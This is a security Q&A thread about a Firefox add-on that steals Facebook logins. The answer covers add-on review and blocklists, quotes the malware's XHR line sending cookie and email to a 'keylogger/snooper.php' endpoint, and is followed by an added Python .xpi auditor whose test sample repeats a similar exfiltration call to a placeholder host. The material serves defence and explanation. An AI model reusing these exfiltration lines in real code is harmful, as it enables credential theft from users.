
Some videos on YouTube demonstrate how a Firefox extension can collect login information used to log in to websites such as Facebook.

After installing this tool/malware as a Firefox Add-on, I observed the activity of my browser using Firebug. My username and password were sent to a server via an Ajax request.

I contacted the author. He said that he can embed this script in any Firefox Add-on.

How can I securely use Firefox Add-ons? I installed 3 types of Antivirus and Firewall. But none of them were able to detect this malware.

Rob W
open source guy
  • For testing I made a new Gmail account. Test the second tool. After 10 or 12 hours I got the entered password in my original account. I have HTTPS connection, antivirus, firewall. Why did this happen? – open source guy Aug 04 '12 at 11:07
  • Related [What are the security implications of people downloading plugins, wrongly thinking that they are safe?](http://security.stackexchange.com/q/5875/665) – Hendrik Brummermann Aug 04 '12 at 11:16
  • @dippu - This sort of malicious file is easy to avoid. Understand how Firefox Add-ons work and only use add-ons that have been verified and are not written by malicious users. – Ramhound Aug 06 '12 at 13:38

1 Answer


How do you protect yourself

Firefox addons from the official site are put through the addon review process: https://addons.mozilla.org/en-US/developers/docs/policies/reviews

So you can check if an addon is official and has been reviewed before installing.

It's not 100%. You can find a list of blocked addons removed by Mozilla due to given reasons (viruses, trojans, etc.): https://addons.mozilla.org/en-US/firefox/blocked/

Installing an addon from a 3rd party is more dangerous, so you may need to personally check the source code (which is possible since it's a zip of JavaScript files) or trust the author/provider.

How does the malware work?

The .xul file contains the following line of code:

    // Sends the cookie and email values to the remote server in the query string.
    xhr.open("GET",
        "http://www.removedurl.com/keylogger/snooper.php?facebook=" + cookie + '&email=' + email,
        true);

So when you test this script on your own account it will be sending him your password. For this reason you should delete this addon and change your password.

Hendrik Brummermann
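As an added example (not part of the original answer or of any add-on's code), here is one way to do the source check the answer describes: open the .xpi as a zip and list every line that makes a network call or names a host you do not expect. The function names, the pattern list and the sample add-on with its `collector.example` host are assumptions constructed for illustration.

```python
import io
import re
import zipfile

SCRIPT_EXT = (".js", ".jsm", ".xul", ".xml", ".html", ".htm")
# Heuristic list of network-capable calls (an assumption, not exhaustive).
NET_CALL = re.compile(r"XMLHttpRequest|\.open\s*\(|\bfetch\s*\(|sendBeacon|WebSocket")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Hosts that appear in XUL/XHTML namespace declarations, not in traffic.
NAMESPACE_HOSTS = {"www.mozilla.org", "www.w3.org"}

def audit_xpi(xpi, allowed_hosts=frozenset()):
    """Return sorted (member, line_no, reason, text) tuples to read by hand."""
    ok = NAMESPACE_HOSTS | {h.lower() for h in allowed_hosts}
    findings = []
    with zipfile.ZipFile(xpi) as archive:
        for name in archive.namelist():
            data = archive.read(name)
            if name.lower().endswith(".jar"):  # older add-ons nest a chrome .jar
                for member, no, why, text in audit_xpi(io.BytesIO(data), ok):
                    findings.append((f"{name}!{member}", no, why, text))
            elif name.lower().endswith(SCRIPT_EXT):
                lines = data.decode("utf-8", errors="replace").splitlines()
                for no, line in enumerate(lines, 1):
                    if NET_CALL.search(line):
                        findings.append((name, no, "network call", line.strip()))
                    for host in map(str.lower, URL_HOST.findall(line)):
                        if host not in ok:
                            findings.append((name, no, f"host {host}", line.strip()))
    return sorted(findings)

def build_sample_xpi():
    """Constructed sample add-on, built in memory so the example runs offline."""
    overlay = (
        '<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">\n'
        "<script>\nvar xhr = new XMLHttpRequest();\n"
        'xhr.open("GET",\n'
        '  "http://collector.example/log.php?email=" + email, true);\n'
        "</script>\n</overlay>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", "<RDF/>")
        z.writestr("chrome/content/overlay.xul", overlay)
    return io.BytesIO(buf.getvalue())

if __name__ == "__main__":
    for finding in audit_xpi(build_sample_xpi()):
        print(*finding, sep=" | ")
```

An empty result is not proof that an add-on is safe, because obfuscated strings defeat pattern matching; treat the output as a list of lines to read first.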